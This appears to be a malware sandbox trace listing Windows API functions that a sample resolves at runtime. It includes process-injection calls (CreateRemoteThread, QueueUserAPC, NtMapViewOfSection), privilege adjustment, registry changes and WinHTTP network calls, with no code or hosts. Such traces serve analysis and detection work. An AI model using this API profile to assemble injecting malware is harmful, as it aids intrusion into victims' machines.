DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/RegisterWaitForSingleObject
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileMappingA
DynamicLoader: kernel32.dll/OpenFileMappingA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/QueueUserAPC
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CallNamedPipeA
DynamicLoader: kernel32.dll/WaitNamedPipeA
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetOverlappedResult
DynamicLoader: kernel32.dll/DisconnectNamedPipe
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CreateNamedPipeA
DynamicLoader: kernel32.dll/CancelIo
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/RemoveVectoredExceptionHandler
DynamicLoader: kernel32.dll/SleepEx
DynamicLoader: kernel32.dll/AddVectoredExceptionHandler
DynamicLoader: kernel32.dll/OpenEventA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: SHLWAPI.dll/StrToIntExA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrTrimA
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpQueryOption
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: GPAPI.dll/RegisterGPNotificationInternal
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: sechost.dll/QueryServiceConfigW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: SensApi.dll/IsNetworkAlive
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptSetHashParam
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureA
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: cryptbase.dll/SystemFunction036
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpQueryDataAvailable
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: cryptnet.dll/I_CryptNetSetUrlCacheFlushInfo
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpSetStatusCallback
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: USER32.dll/GetShellWindow
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: ntdll.dll/RtlExitUserThread
DynamicLoader: kernel32.dll/CreateRemoteThread
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ncrypt.dll/SslFreeObject
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/strcpy
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/NtResumeProcess
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtSuspendProcess
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/_snprintf
DynamicLoader: ntdll.dll/_wcsupr
DynamicLoader: ntdll.dll/_strupr
DynamicLoader: ntdll.dll/memmove
DynamicLoader: ntdll.dll/wcscpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwQueryKey
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/wcstombs
DynamicLoader: ntdll.dll/RtlImageNtHeader
DynamicLoader: ntdll.dll/RtlAdjustPrivilege
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/sprintf
DynamicLoader: ntdll.dll/wcscat
DynamicLoader: ntdll.dll/__C_specific_handler
DynamicLoader: ntdll.dll/__chkstk
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/SystemTimeToFileTime
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/RemoveDirectoryA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/HeapReAlloc
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/GetCurrentThread
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/OpenWaitableTimerA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/UnregisterWait
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/RegisterWaitForSingleObject
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileMappingA
DynamicLoader: kernel32.dll/OpenFileMappingA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/QueueUserAPC
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CallNamedPipeA
DynamicLoader: kernel32.dll/WaitNamedPipeA
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetOverlappedResult
DynamicLoader: kernel32.dll/DisconnectNamedPipe
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CreateNamedPipeA
DynamicLoader: kernel32.dll/CancelIo
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/RemoveVectoredExceptionHandler
DynamicLoader: kernel32.dll/SleepEx
DynamicLoader: kernel32.dll/AddVectoredExceptionHandler
DynamicLoader: kernel32.dll/OpenEventA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: SHLWAPI.dll/StrToIntExA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrTrimA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpQueryOption
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: Secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sensapi.dll/IsNetworkAlive
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: devrtl.DLL/DevRtlGetThreadLogToken
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
